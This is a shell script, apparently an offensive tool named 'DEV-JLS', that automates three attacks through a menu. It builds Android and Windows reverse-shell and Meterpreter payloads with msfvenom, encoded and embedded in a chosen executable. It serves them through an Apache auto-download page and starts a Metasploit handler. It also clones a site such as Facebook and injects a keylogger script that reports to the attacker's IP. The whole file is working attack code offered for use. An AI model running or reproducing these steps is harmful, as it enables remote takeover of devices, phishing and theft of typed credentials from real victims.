#!/bin/sh

## COLORS ##
Colors() {
Escape="\033";
  white="${Escape}[0m";
  Red="${Escape}[31m";
  Green="${Escape}[32m";
  Yellow="${Escape}[33m";
  Blue="${Escape}[34m";
  Cyan="${Escape}[36m";
Reset="${Escape}[0m";
}

## VARIABLE ##
InT3R=`netstat -r | grep "default" | awk {'print $8'}`
IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`
Os=`awk '{print $1}' /etc/issue`
Path=`pwd`
ApaPath="/var/www/html/"

clear

Colors;
cat << !

    ██████╗░███████╗██╗░░░██╗░░░░░░██╗██╗░░░░░░██████╗     
    ██╔══██╗██╔════╝██║░░░██║░░░░░░██║██║░░░░░██╔════╝     
    ██║░░██║█████╗░░╚██╗░██╔╝█████╗██║██║░░░░░╚█████╗░      
    ██║░░██║██╔══╝░░░╚████╔╝░╚════╝██║██║░░░░░░╚═══██╗     
    ██████╔╝███████╗░░╚██╔╝░░░░░░░░██║███████╗██████╔╝     
    ╚═════╝░╚══════╝░░░╚═╝░░░░░░░░░╚═╝╚══════╝╚═════╝░     
    
!

echo ""
echo "         ╔──Welcome to the future generation──╗"
echo "         |                                    |"
echo "         ╘───────${Yellow}LOADING.............${Reset}─────────╝"
echo ""
sleep 3
clear

cat << !

    ██████╗░███████╗██╗░░░██╗░░░░░░██╗██╗░░░░░░██████╗      ───▄█▌─▄─▄─▐█▄
    ██╔══██╗██╔════╝██║░░░██║░░░░░░██║██║░░░░░██╔════╝      ───██▌▀▀▄▀▀▐██
    ██║░░██║█████╗░░╚██╗░██╔╝█████╗██║██║░░░░░╚█████╗░      ───██▌─▄▄▄─▐██
    ██║░░██║██╔══╝░░░╚████╔╝░╚════╝██║██║░░░░░░╚═══██╗      ───▀██▌▐█▌▐██▀
    ██████╔╝███████╗░░╚██╔╝░░░░░░░░██║███████╗██████╔╝      ▄██████─▀─██████▄
    ╚═════╝░╚══════╝░░░╚═╝░░░░░░░░░╚═╝╚══════╝╚═════╝░      █████████████████
    
!

echo ""
echo "         ╔──Welcome to the future generation──╗"
echo "         |                                    |"
echo "         ╘───────Press ${Red}ENTER ${Reset}to start─────────╝"
echo ""
read OP


## need access root ##

if [ $(id -u) != "0" ]; then
echo ""
echo ">>  ${Red}ERROR!! can you run me into the root privileges?${Reset}"
echo ""
echo ">>  Press Entrez to exit and restart me again"
echo ""
read OP
exit
clear
fi

echo "      >>>>> Analyse Data informations system <<<<<"
echo ""
# reseau
if [ $(cat /sys/class/net/wlan0/operstate) = "up" ]; then
echo " [✔] Interface :$InT3R  // Ip :${IP}"
else
    if [ $(cat /sys/class/net/eth0/operstate) = "up" ]; then
    echo " [✔] Interface :$InT3R  // Ip :${IP}"
    else
    echo " [X] Need Interface compatible "
    exit
    fi
fi
sleep 0.5

# OS
echo " [✔] Operating System : $Os "
sleep 0.5

# Check tools
test=`which apache2`
if [ "$?" != "0" ]; then
echo " [X] Apache not found "
exit
else
echo " [✔] Apache installed "
fi
sleep 0.5

test=`which wget`
if [ "$?" != "0" ]; then
echo " [X] Wget not found "
exit
else
echo " [✔] Wget installed "
fi
sleep 0.5

test=`which xterm`
if [ "$?" != "0" ]; then
echo " [X] Xterm not found "
exit
else
echo " [✔] Xterm installed "
fi
sleep 0.5

test=`which msfconsole`
if [ "$?" != "0" ]; then
echo " [X] Metasploit not found "
exit
else
echo " [✔] Metasploit installed "
fi
sleep 0.5

test=`which java`
if [ "$?" != "0" ]; then
echo " [X] Java not found "
exit
else
echo " [✔] Java installed "
fi
sleep 0.5

test=`which keytool`
if [ "$?" != "0" ]; then
echo " [X] Keytool not found "
exit
else
echo " [✔] Keytool installed "
fi
sleep 0.5

test=`which apktool`
if [ "$?" != "0" ]; then
echo " [X] Apktool not found "
exit
else
echo " [✔] Apktool installed "
fi
sleep 0.5

test=`which jarsigner`
if [ "$?" != "0" ]; then
echo " [X] Jarsigner not found "
exit
else
echo " [✔] Jarsigner installed "
fi
sleep 0.5

test=`which apksigner`
if [ "$?" != "0" ]; then
echo " [X] Apksigner not found "
exit
else
echo " [✔] Apksigner installed "
fi
sleep 0.5

test=`which aapt`
if [ "$?" != "0" ]; then
echo " [X] Aapt not found "
exit
else
echo " [✔] Aapt installed "
fi
sleep 0.5

test=`which zipalign`
if [ "$?" != "0" ]; then
echo " [X] Zipalign not found "
exit
else
echo " [✔] Zipalign installed "
fi
sleep 0.5

####################
## ATTACK ANDROID ##
####################
at1 () {
cd data/
echo ""
echo "Your default adress is: ${IP} .Enter your ip adress."
read -p ">> " lhost
echo ""
echo "Enter your port"
read -p ">> " lport
echo ""
cat << !

    1- android/meterpreter/reverse_http                    Run a meterpreter server in Android
    2- android/meterpreter/reverse_https                   Run a meterpreter server in Android
    3- android/meterpreter/reverse_tcp                     Run a meterpreter server in Android
    4- android/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    5- android/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    5- android/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    6- android/shell/reverse_http                          Spawn a piped command shell (sh)
    7- android/shell/reverse_https                         Spawn a piped command shell (sh)
    8- android/shell/reverse_tcp                           Spawn a piped command shell (sh)
    R- Return to home page


!

echo "Chose your attack type"
read -p ">> " attackAndro
case $attackAndro in
1) a="android/meterpreter/reverse_http";;
2) a="android/meterpreter/reverse_https";;
3) a="android/meterpreter/reverse_tcp";;
4) a="android/meterpreter_reverse_http";;
5) a="android/meterpreter_reverse_https";;
5) a="android/meterpreter_reverse_tcp";;
6) a="android/shell/reverse_http";;
7) a="android/shell/reverse_https";;
8) a="android/shell/reverse_tcp";;
R) HomePage ;;
*) echo "\"$choice\": is not a valid Option"; sleep 1.3 ;;
esac

sed "s|<\/head>|<meta http-equiv=\"refresh\" content=\"0; url=MainActivity.apk \"><\/head>|" web.html > index.html
xterm -T "CREAT PAYLOAD" -geometry 120x27 -e "msfvenom -p $a lhost=$lhost lport=$lport -o MainActivity.apk"
mv index.html $ApaPath > /dev/null 2>&1
mv MainActivity.apk $ApaPath > /dev/null 2>&1
/etc/init.d/apache2 start


xterm -T "MSF ATTACK ANDROID" -geometry 120x27 -e "sudo msfconsole -x 'use multi/handler; set payload $a; set lhost $lhost; set lport $lport; exploit'" &
echo "Press Ctrl+C to exit"


}
####################
## ATTACK WINDOWS ##
####################
at2() {

cd data/
echo ""
echo "Your default adress is: ${IP} .Enter your ip adress."
read -p ">> " lhost
echo ""
echo "Enter your port"
read -p ">> " lport
echo ""
read -p "Enter the local directory and name file to embed the payload" pgram
cat << !

                    ### This payload is for program executable x86 ONLY ###

    1- windows/meterpreter/reverse_http                    Run a meterpreter server in Windows
    2- windows/meterpreter/reverse_https                   Run a meterpreter server in Windows
    3- windows/meterpreter/reverse_tcp                     Run a meterpreter server in Windows
    4- windows/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    5- windows/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    5- windows/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    6- windows/shell/reverse_tcp                           Spawn a piped command shell (sh)
    R- Return to home page


!

echo "Chose your attack type"
read -p ">> " attackAndro
case $attackAndro in
1) w="windows/meterpreter/reverse_http";;
2) w="windows/meterpreter/reverse_https";;
3) w="windows/meterpreter/reverse_tcp";;
4) w="windows/meterpreter_reverse_http";;
5) w="windows/meterpreter_reverse_https";;
5) w="windows/meterpreter_reverse_tcp";;
6) w="windows/shell/reverse_tcp";;
R) HomePage ;;
*) echo "\"$choice\": is not a valid Option"; sleep 1.3 ;;
esac
xterm -T "CREAT PAYLOAD" -geometry 120x27 -e "msfvenom -a x86 --platform windows -x $pgram -k -p $w lhost=$lhost lport=$lport -e x86/shikata_ga_nai -i 3 -f exe -o Executable.exe "

sed "s|<\/head>|<meta http-equiv=\"refresh\" content=\"0; url=Executable.exe \"><\/head>|" web.html > index.html
mv index.html $ApaPath > /dev/null 2>&1
mv Executable.exe $ApaPath > /dev/null 2>&1
/etc/init.d/apache2 start


xterm -T "MSF ATTACK ANDROID" -geometry 120x27 -e "sudo msfconsole -x 'use multi/handler; set payload $w; set lhost $lhost; set lport $lport; exploit'" &
echo "Press Ctrl+C to exit"

}

#####################
## PHISHING ATTACK ##
#####################
at3() {

cd data/
echo ""
mkdir clone && cd clone
echo "Enter the link to cloning website , example: www.facebook.com"
echo ""
read -p ">> " clnWeb
wget -qq -U Mozilla -m -nd -nv -Q 900000 -A.html,.jpg,.png,.ico,.php,.js,.css,.gif $clnWeb
echo "cloning website $clnWeb ....."
sleep 4
echo " Inject payload keylogger Into cloned webpage"
sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > copy.html
mv -f copy.html $ApaPath/index.html
echo " Start service Apache ..."
/etc/init.d/apache2 start
xterm -T "MORPHEUS TCP/IP HIJACKING" -geometry 110x40 -e "sudo msfconsole -x 'use auxiliary/server/capture/http_javascript_keylogger; set DEMO 0; set LHOST $IP; set URIPATH support; exploit'"
}


#####################
## MAIN MENU SHELL ##
#####################
while :
do
clear
cat << !

    ██████╗░███████╗██╗░░░██╗░░░░░░██╗██╗░░░░░░██████╗      ───▄█▌─▄─▄─▐█▄
    ██╔══██╗██╔════╝██║░░░██║░░░░░░██║██║░░░░░██╔════╝      ───██▌▀▀▄▀▀▐██
    ██║░░██║█████╗░░╚██╗░██╔╝█████╗██║██║░░░░░╚█████╗░      ───██▌─▄▄▄─▐██
    ██║░░██║██╔══╝░░░╚████╔╝░╚════╝██║██║░░░░░░╚═══██╗      ───▀██▌▐█▌▐██▀
    ██████╔╝███████╗░░╚██╔╝░░░░░░░░██║███████╗██████╔╝      ▄██████─▀─██████▄
    ╚═════╝░╚══════╝░░░╚═╝░░░░░░░░░╚═╝╚══════╝╚═════╝░      █████████████████
    


            ╔─── 1  -   Attack Android
            |
            ╠─── 2  -   Attack Windows
            |
            ╠─── 3  -   Phishing Attack
            
!
echo "      Choice Attack"
echo ""
read -p ">> " choice
case $choice in
1) at1 ;;
2) at2 ;;
3) at3 ;;
E) exit ;;
*) echo "\"$choice\": is not a valid Option"; sleep 1.3 ;;
esac
done

